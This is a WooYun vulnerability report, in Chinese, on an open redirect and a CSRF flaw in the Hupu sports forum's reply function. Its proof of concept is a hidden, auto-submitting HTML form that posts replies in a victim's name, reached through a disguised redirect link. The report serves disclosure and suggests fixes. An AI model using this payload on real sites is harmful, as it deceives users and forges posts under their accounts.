当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110198

漏洞标题:虎扑URL跳转+CSRF可以任意水帖

相关厂商:虎扑体育网

漏洞作者: 路人甲

提交时间:2015-04-27 12:22

修复时间:2015-04-27 12:45

公开时间:2015-04-27 12:45

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:1

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-27: 细节已通知厂商并且等待厂商处理中
2015-04-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT,成功让室友水贴

详细说明:

URL跳转:go.hupu.com/u?url=
CSRF:bbs回帖处 无token,无referer判断
所以http://go.hupu.com/u?url=http://x.x.x.x/csrf.html 可能更有欺骗性

漏洞证明:

<div id="bodyframe" style="VISIBILITY: hidden">
<form id="fastform" name="FORM" class="j_atc_content left" method="post" action="http://bbs.hupu.com/post.php?" onsubmit="textConvert('fastform', 'atc_content')">
<!--回复框-->
<div id="re" class="box"><div id="re_top"></div>
<div id="re_box">
<div class="left"><a class="headpic" href="http://my.hupu.com/19312932"><img width="45" height="45" src="http://i1.hoopchina.com.cn/user/default_small.jpg"></a><br>&nbsp;<a class="blue" style="" href="http://my.hupu.com/set.php?s=picture">更新头像</a></div>
<div class="input"><a id="j_face" class="face_button" title="点击选择你要添加的表情">&nbsp;</a>
<div class="plate_03" style="position:absolute;top:0;right:5px;font-size:14px;">
<!-- 文字链广告-->
<script type="text/javascript">
GA_googleFillSlotWithSize("ca-pub-1024337685431355", "word_bbs_content", 300, 20);
</script><script async="" type="text/javascript" src="http://www.googletagservices.com/tag/js/check_359604.js"></script><iframe src="http://tpc.googlesyndication.com/safeframe/1-0-2/html/container.html" style="visibility: hidden; display: none;"></iframe><div id="google_ads_div_word_bbs_content"><ins style="position:relative;width:300px;height:20px;border:none;display:inline-table;"><ins style="position:relative;width:300px;height:20px;border:none;display:block;"><iframe id="google_ads_iframe_word_bbs_content" name="google_ads_iframe_word_bbs_content" width="300" height="20" vspace="0" hspace="0" allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" style="border:0px;left:0;position:absolute;top:0;" src="http://pubads.g.doubleclick.net/gampad/ads?correlator=3366246463569920&amp;output=html&amp;impl=ifr&amp;client=ca-pub-1024337685431355&amp;slotname=word_bbs_content&amp;page_slots=word_bbs_content&amp;cookie=ID%3D109e1fe8b0dad7a0%3AT%3D1429776732%3AS%3DALNI_MbzO8BbJ61Pyd4OVMHyoyHY-ukiyw&amp;url=http%3A%2F%2Fbbs.hupu.com%2F12523690-last.html%23o&amp;ref=http%3A%2F%2Fbbs.hupu.com%2Fpost.php%3F&amp;lmt=1429777822&amp;dt=1429777822133&amp;cc=100&amp;biw=1349&amp;bih=667&amp;adk=3149788808&amp;adx=451&amp;ady=2599&amp;ifi=1&amp;oid=3&amp;ea=0&amp;u_tz=480&amp;u_his=12&amp;u_java=true&amp;u_h=768&amp;u_w=1366&amp;u_ah=728&amp;u_aw=1366&amp;u_cd=24&amp;u_nplug=27&amp;u_nmime=98&amp;flash=16.0.0&amp;gads=v2&amp;ga_vid=1233016655.1429777822&amp;ga_sid=1429777822&amp;ga_hid=832738673"></iframe></ins></ins></div></div>
<div id="face_lable" class="face_img" style="display:none;overflow-y:scroll;"><div id="leftface" class="left"></div></div>
<textarea name="atc_content" id="atc_content" rows="8" style="height: 96px;" value="6666666666666"></textarea>
<div class="fb_pic" id="add_li_vote" style=" margin:-3px 8px 10px 0; display:none;">
<input name="usevote" id="usevote" type="hidden" value="0">
<input name="douid" id="usevote" type="hidden" value="1">
<input name="votetype" type="hidden" value="bbs">
<a href="javascript:;" id="del_vote" class="del" style="float:right">&nbsp;</a><strong>添加投票</strong><br>
<span class="f666">投票主题:</span><input id="votetitle" name="votetitle" class="inputfile" style="border-top:1px solid #444;border-left:1px solid #444;width:400px;" type="text">
<div id="uppic1"><span class="f666">选项1:</span><input name="votename[]" type="text" class="inputfile"></div>
<div id="uppic2"><span class="f666">选项2:</span><input name="votename[]" type="text" class="inputfile"></div>
<div id="uppic3"><span class="f666">选项3:</span><input name="votename[]" type="text" class="inputfile"><a class="blue" onclick="delvotenoe('3')" href="javascript:;"> X </a></div>
<input name="editnum" type="hidden" id="editnum" value="3">
<input name="nowitnum" type="hidden" id="nowitnum" value="3">
<div id="addvote"></div>
<div class="f444" style="width:425px;"><span class="f666">&nbsp;</span><div id="addvotenum"><a class="blue right" onclick="doadd(1)" href="javascript:;">+增加一项</a></div><label for="multiplevote"><input id="multiplevote" type="checkbox"> 允许多选</label><span style="display:none;">,最多可选<input name="voteclass" class="inputtext width60px" size="1" maxlength="2" value="">个</span></div>
</div>
<div class="right" style=""><label for="fbd_reply_note"><input name="fbd_reply_note" type="checkbox" value="1" id="fbd_reply_note">同步发布到<a class="blue" href="http://my.hupu.com/19312932/note">我的碎碎念</a></label></div>
<input name="postfast" type="hidden" value="2">
<input id="fastbtn" class="btns2" type="submit" value="回 复" title="按 Ctrl + Enter 可提交回复">
<span style="margin-left:20px;"><a id="p4" class="blue" href="javascript:;">添加投票</a></span>
<span id="adv_reply" style="margin-left:20px;"><a id="orz" class="blue" href="/post.php?action=reply&amp;fid=1048&amp;tid=12523690&amp;replayofpage=">高级回复 ?</a></span>
</div>
<div class="clearfix"></div></div>
<div id="re_bottom"></div></div><!--回复框END-->
<input type="hidden" name="atc_title" value="Re:【赛后】快船加时107:111马刺 邓肯28分11板4助 莱昂纳德23分9板3助 米尔斯18分" size="65">
<input type="hidden" name="atc_usesign" value="1">
<input type="hidden" name="atc_convert" value="1">
<input type="hidden" name="atc_autourl" value="1">
<input type="hidden" value="2" name="step">
<input type="hidden" value="reply" name="action">
<input type="hidden" value="1048" name="fid">
<input type="hidden" value="12523690" name="tid">
<input type="hidden" value="【赛后】快船加时107:111马刺 邓肯28分11板4助 莱昂纳德23分9板3助 米尔斯18分" name="subject">
<input type="hidden" value="0" name="editor">
<input type="hidden" value="none" name="atc_attachment">
<input type="hidden" value="" name="replayofpage">
<input type="hidden" value="1" name="replaymeta">
</form>
</div>
<script>
document.getElementById("atc_content").value="老男人果然硬。。。。";
document.forms[0].submit();
</script>

修复方案:

加token
判断referer

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-27 12:45

厂商回复:

不错,很细心。

最新状态:

暂无


漏洞评价:

评论